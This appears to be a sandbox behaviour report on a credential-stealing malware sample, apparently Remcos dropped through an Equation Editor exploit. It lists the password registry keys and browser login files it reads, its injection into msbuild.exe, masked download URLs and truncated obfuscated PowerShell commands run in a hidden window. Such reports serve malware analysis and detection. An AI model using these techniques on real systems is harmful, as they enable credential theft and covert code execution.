Technical Information
Malicious functions
Creates and executes the following
- '' (downloaded from the Internet)
Creates and executes the following (exploit)
- 'C:\users\public\908.exe'
Injects code into
the following system processes:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\Microsoft\MSNMessenger]
- [<HKCU>\Software\Microsoft\IdentityCRL]
- [<HKCU>\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users]
- [<HKCU>\Software\America Online\AIM6\Passwords]
- [<HKCU>\Software\AIM\AIMPRO]
- [<HKCU>\Software\Yahoo\Pager]
- [<HKLM>\Software\Wow6432Node\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Google\Google Talk\Accounts]
- [<HKCU>\Software\Paltalk]
- [<HKCU>\Software\Microsoft\Internet Account Manager\Accounts]
- [<HKCU>\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
- [<HKCU>\Identities\{91255D00-95D9-49F5-8E84-7C027F5283B7}\Software\Microsoft\Internet Account Manager\Accounts]
- [<HKCU>\Identities\{91255D00-95D9-49F5-8E84-7C027F5283B7}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts]
- [<HKCU>\Software\Microsoft\Windows Live Mail]
Reads files which store third party applications passwords
- %APPDATA%\mozilla\firefox\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
Modifies file system
Creates the following files
- C:\users\public\908.exe
- %APPDATA%\remcos\logs.dat
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\zdoyrsrcykmmjjju
Deletes the following files
- %TEMP%\zdoyrsrcykmmjjju
Network activity
TCP
HTTP GET requests
- http://bi#.ly/3gv1jTG
- http://su####home.co.id/d0cs/bina.jpg
UDP
- DNS ASK bi#.ly
- DNS ASK su####home.co.id
- DNS ASK pa##e.ee
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcA...' (with hidden window)
Executes the following
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZ...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe' /stext "%TEMP%\zdoyrsrcykmmjjju"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe' /stext "%TEMP%\kfbiscbwmseqmpxyqaa"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe' /stext "%TEMP%\uzgbtvmxaawdwdtchlveog"
